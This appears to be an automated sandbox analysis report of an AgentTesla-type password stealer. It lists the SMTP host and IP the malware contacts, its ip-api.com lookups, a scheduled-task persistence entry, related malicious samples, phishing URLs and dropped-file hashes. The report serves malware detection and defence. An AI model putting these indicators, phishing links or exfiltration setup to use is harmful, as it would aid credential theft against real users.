                              • URL Reputation: safe
                              unknown
                              https://account.dyn.com/SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000000.00000002.2146302322.000000000400E000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000A.00000002.2187787442.000000000441F000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3365722284.0000000000429000.00000040.00000400.00020000.00000000.sdmpfalse
                                high
                                http://us2.smtp.mailhostbox.comSecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3368803671.000000000328D000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3368762224.0000000002C37000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000000.00000002.2145030822.0000000002E18000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3368803671.0000000003231000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000A.00000002.2186008382.0000000003228000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3368762224.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://ip-api.com/line/?fields=hostingCilnYkIr.exe, 0000000E.00000002.3367006333.0000000000ED6000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://crl.usertrlnYkIr.exe, 0000000E.00000002.3379016292.0000000006706000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://ocsp.usertrulnYkIr.exe, 0000000E.00000002.3379016292.0000000006706000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://ip-api.comSecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3368803671.0000000003231000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3368762224.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        208.91.198.143
                                        us2.smtp.mailhostbox.comUnited States
                                        394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                        208.95.112.1
                                        ip-api.comUnited States
                                        53334TUT-ASUSfalse
                                        Joe Sandbox version:40.0.0 Tourmaline
                                        Analysis ID:1391079
                                        Start date and time:2024-02-12 20:38:09 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 8m 14s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:17
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@19/15@2/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 98%
                                        • Number of executed functions: 75
                                        • Number of non-executed functions: 13
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 104.84.231.216, 104.84.231.210
                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtCreateKey calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • VT rate limit hit for: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
                                        TimeTypeDescription
                                        20:39:07API Interceptor46x Sleep call for process: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe modified
                                        20:39:09Task SchedulerRun new task: lnYkIr path: C:\Users\user\AppData\Roaming\lnYkIr.exe
                                        20:39:09API Interceptor36x Sleep call for process: powershell.exe modified
                                        20:39:12API Interceptor30x Sleep call for process: lnYkIr.exe modified
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        208.91.198.143z1CVMarianaAlvarez.exeGet hashmaliciousAgentTeslaBrowse
                                          ohXZyyZaky.exeGet hashmaliciousAgentTeslaBrowse
                                            SecuriteInfo.com.Win32.PWSX-gen.19040.6591.exeGet hashmaliciousAgentTeslaBrowse
                                              SecuriteInfo.com.Win32.PWSX-gen.2245.21332.exeGet hashmaliciousAgentTeslaBrowse
                                                PO-ENG-114099.exeGet hashmaliciousAgentTeslaBrowse
                                                  SecuriteInfo.com.Win32.PWSX-gen.3245.1850.exeGet hashmaliciousAgentTeslaBrowse
                                                    PO_#1109273.exeGet hashmaliciousAgentTeslaBrowse
                                                      SecuriteInfo.com.Win32.CrypterX-gen.22358.8429.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        SecuriteInfo.com.Trojan.PackedNET.2658.21780.19821.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          DHL_AWB#20248791029.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            208.95.112.1SecuriteInfo.com.Win32.PWSX-gen.2313.1743.exeGet hashmaliciousAgentTeslaBrowse
                                                            • ip-api.com/line/?fields=hosting
                                                            Rendel#U00e9s_(PO5042208)_Az Idumont.htaGet hashmaliciousAgentTeslaBrowse
                                                            • ip-api.com/line/?fields=hosting
                                                            ros88477566tyyfh.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                            • ip-api.com/line/?fields=hosting
                                                            Tax Returns Of R38,765.jsGet hashmaliciousWSHRATBrowse
                                                            • ip-api.com/json/
                                                            REQUEST FOR QUOTATION.exeGet hashmaliciousAgentTeslaBrowse
                                                            • ip-api.com/line/?fields=hosting
                                                            YDDE2rhoMw.apkGet hashmaliciousOctoBrowse
                                                            • www.ip-api.com/json
                                                            2e.kaGet hashmaliciousOctoBrowse
                                                            • www.ip-api.com/json
                                                            AMENDED PO_#KRMU _YMHG7 PO#QSB-8927393QSB-94 & QSB-95_24.exeGet hashmaliciousAgentTeslaBrowse
                                                            • ip-api.com/line/?fields=hosting
                                                            rS24903-SHIPMENT-BLANDCOADV-MVPANVIVA.exeGet hashmaliciousAgentTeslaBrowse
                                                            • ip-api.com/line/?fields=hosting
                                                            rDHLAWB5032675620.pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • ip-api.com/line/?fields=hosting
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            us2.smtp.mailhostbox.comSecuriteInfo.com.Win32.PWSX-gen.2313.1743.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.199.224
                                                            z1CVMarianaAlvarez.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.198.143
                                                            List of orders.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.199.225
                                                            DOC PDF New Purchase Order BMSiMbGVzRAUuaJ.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.199.224
                                                            ohXZyyZaky.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.198.143
                                                            BN63T5qr1N.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.199.223
                                                            t3rNXpEr5n.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.199.224
                                                            SecuriteInfo.com.Win32.PWSX-gen.19040.6591.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.198.143
                                                            SecuriteInfo.com.Win32.PWSX-gen.10367.16269.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.199.223
                                                            SecuriteInfo.com.Win32.PWSX-gen.32728.2984.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.199.224
                                                            fp2e7a.wpc.phicdn.nethttp://dse@docusign.netGet hashmaliciousUnknownBrowse
                                                            • 192.229.211.108
                                                            https://sites.google.com/view/busch-vacuum/homeGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                            • 192.229.211.108
                                                            https://bafybeibys33wxb3zsn3kr7v63k6xulnnzzqohzhbw563vnonjrze3yezeq.ipfs.dweb.link/Get hashmaliciousUnknownBrowse
                                                            • 192.229.211.108
                                                            http://atlli.com/Get hashmaliciousUnknownBrowse
                                                            • 192.229.211.108
                                                            http://www.vilicicsa.clGet hashmaliciousUnknownBrowse
                                                            • 192.229.211.108
                                                            https://tracking.arbolus.com/u/gIKFUa0YUMyAXVmBzVV5WY2QkI/i02bj5CbpFWbnBUO3UzMxIXZtFmc0R3bjNnI/Get hashmaliciousUnknownBrowse
                                                            • 192.229.211.108
                                                            https://lilacsolutions.com/Get hashmaliciousUnknownBrowse
                                                            • 192.229.211.108
                                                            https://protect-de.mimecast.com/s/S6wVCNOl15IJZqMqT4-IEIGet hashmaliciousUnknownBrowse
                                                            • 192.229.211.108
                                                            https://sushishop.commander1.com/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=https://securecloud.cloud/auth/office/%2Fnew%2Fauth%2FIdvr%2F%2F%2F%2FaG1pY2tlbEB0b25nYXNzZmN1LmNvbQ==#%3CFONT%20id=%7Bddkuqzqy%7D%3E%E2%80%8F%3CSTRONG%3Eddkuqzqy%3C/STRONG%3E%E2%80%8E%3C/FONT%3E%3CFONT%20id=%7Bddkuqzqy%7D%3E%E2%80%8F%3CSTRONG%3Eddkuqzqy%3C/STRONG%3E%E2%80%8E%3C/FONT%3E%3CFONT%20id=%7Bddkuqzqy%7D%3E%E2%80%8F%3CSTRONG%3Eddkuqzqy%3C/STRONG%3E%E2%80%8E%3C/FONT%3E%3CFONT%20id=%7Bddkuqzqy%7D%3E%E2%80%8F%3CSTRONG%3Eddkuqzqy%3C/STRONG%3E%E2%80%8E%3C/FONT%3E%3CFONT%20id=%7Bddkuqzqy%7D%3E%E2%80%8F%3CSTRONG%3Eddkuqzqy%3C/STRONG%3E%E2%80%8E%3C/FONT%3E%3CFONT%20id=%7Bddkuqzqy%7D%3E%E2%80%8F%3CSTRONG%3Eddkuqzqy%3C/STRONG%3E%E2%80%8E%3C/FONT%3E%3CFONT%20id=%7Bddkuqzqy%7D%3E%E2%80%8F%3CSTRONG%3Eddkuqzqy%3C/STRONG%3E%E2%80%8E%3C/FONT%3E%3CFONT%20id=%7Bddkuqzqy%7D%3E%E2%80%8F%3CSTRONG%3Eddkuqzqy%3C/STRONG%3E%E2%80%8E%3C/FONT%3E%3CFONT%20id=%7Bddkuqzqy%7D%3E%E2%80%8F%3CSTRONG%3Eddkuqzqy%3C/STRONG%3E%E2%80%8E%3C/FONT%3E%3CFONT%20id=%7Bddkuqzqy%7D%3E%E2%80%8F%3CSTRONG%3Eddkuqzqy%3C/STRONG%3E%E2%80%8E%3C/FONT%3E%3CFONT%20id=%7Bddkuqzqy%7D%3E%E2%80%8F%3CSTRONG%3Eddkuqzqy%3C/STRONG%3E%E2%80%8E%3C/FONT%3E%3CFONT%20id=%7Bddkuqzqy%7D%3E%E2%80%8F%3CSTRONG%3Eddkuqzqy%3C/STRONG%3E%E2%80%8E%3C/FONT%3E%3CFONT%20id=%7Bddkuqzqy%7D%3E%E2%2Get hashmaliciousUnknownBrowse
                                                            • 192.229.211.108
                                                            https://counteractbalancing.com/Get hashmaliciousUnknownBrowse
                                                            • 192.229.211.108
                                                            ip-api.comSecuriteInfo.com.Win32.PWSX-gen.2313.1743.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.95.112.1
                                                            Rendel#U00e9s_(PO5042208)_Az Idumont.htaGet hashmaliciousAgentTeslaBrowse
                                                            • 208.95.112.1
                                                            ros88477566tyyfh.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                            • 208.95.112.1
                                                            Tax Returns Of R38,765.jsGet hashmaliciousWSHRATBrowse
                                                            • 208.95.112.1
                                                            REQUEST FOR QUOTATION.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.95.112.1
                                                            AMENDED PO_#KRMU _YMHG7 PO#QSB-8927393QSB-94 & QSB-95_24.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.95.112.1
                                                            https://dashboard-coinbases.cloud/Get hashmaliciousPhisherBrowse
                                                            • 38.91.107.240
                                                            rS24903-SHIPMENT-BLANDCOADV-MVPANVIVA.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.95.112.1
                                                            rDHLAWB5032675620.pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 208.95.112.1
                                                            rPO00140263___-Order.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.95.112.1
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            PUBLIC-DOMAIN-REGISTRYUSSecuriteInfo.com.Win32.PWSX-gen.2313.1743.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.199.224
                                                            rDHLAWB5032675620.pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 162.251.85.153
                                                            PO-H23-0006384.exeGet hashmaliciousFormBookBrowse
                                                            • 119.18.54.24
                                                            z1CVMarianaAlvarez.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.198.143
                                                            Quotation.docGet hashmaliciousUnknownBrowse
                                                            • 204.11.59.228
                                                            List of orders.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.199.225
                                                            Document.htmGet hashmaliciousHTMLPhisherBrowse
                                                            • 103.21.59.208
                                                            DOC PDF New Purchase Order BMSiMbGVzRAUuaJ.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.199.224
                                                            ohXZyyZaky.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.198.143
                                                            BN63T5qr1N.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.199.223
                                                            TUT-ASUSSecuriteInfo.com.Win32.PWSX-gen.2313.1743.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.95.112.1
                                                            Rendel#U00e9s_(PO5042208)_Az Idumont.htaGet hashmaliciousAgentTeslaBrowse
                                                            • 208.95.112.1
                                                            ros88477566tyyfh.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                            • 208.95.112.1
                                                            Tax Returns Of R38,765.jsGet hashmaliciousWSHRATBrowse
                                                            • 208.95.112.1
                                                            REQUEST FOR QUOTATION.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.95.112.1
                                                            YDDE2rhoMw.apkGet hashmaliciousOctoBrowse
                                                            • 208.95.112.1
                                                            2e.kaGet hashmaliciousOctoBrowse
                                                            • 208.95.112.1
                                                            AMENDED PO_#KRMU _YMHG7 PO#QSB-8927393QSB-94 & QSB-95_24.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.95.112.1
                                                            rS24903-SHIPMENT-BLANDCOADV-MVPANVIVA.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.95.112.1
                                                            rDHLAWB5032675620.pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 208.95.112.1
                                                            No context
                                                            No context
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.34331486778365
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                            Process:C:\Users\user\AppData\Roaming\lnYkIr.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.34331486778365
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):2232
                                                            Entropy (8bit):5.379460230152629
                                                            Encrypted:false
                                                            SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:fLHyIFKL3IZ2KRH9Oug8s
                                                            MD5:4DC84D28CF28EAE82806A5390E5721C8
                                                            SHA1:66B6385EB104A782AD3737F2C302DEC0231ADEA2
                                                            SHA-256:1B89BFB0F44C267035B5BC9B2A8692FF29440C0FEE71C636B377751DAF6911C0
                                                            SHA-512:E8F45669D27975B41401419B8438E8F6219AF4D864C46B8E19DC5ECD50BD6CA589BDEEE600A73DDB27F8A8B4FF7318000641B6A59E0A5CDD7BE0C82D969A68DE
                                                            Malicious:false
                                                            Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
                                                            File Type:XML 1.0 document, ASCII text
                                                            Category:dropped
                                                            Size (bytes):1579
                                                            Entropy (8bit):5.097049290187453
                                                            Encrypted:false
                                                            SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtFNxvn:cgergYrFdOFzOzN33ODOiDdKrsuTFTv
                                                            MD5:BFAAB82E2AEDC6DB97894A2168E57B86
                                                            SHA1:60F6EB20D6147FF9C17ED46E179DF6369FA78A27
                                                            SHA-256:4104608D4B81BC1B11F4C6E54FB103D0DDAA86F302AE1184FC2F3F3BAE2D60A5
                                                            SHA-512:133B6963A33ECFCE3ABDE4E1DEBFAFC99FF5CF1B8BF8230C4D190DED47C3FC7D5227E848E371F9501CE4EA540E0D21C22B8E70FC305C60987AA83D61D4CABEE7
                                                            Malicious:true
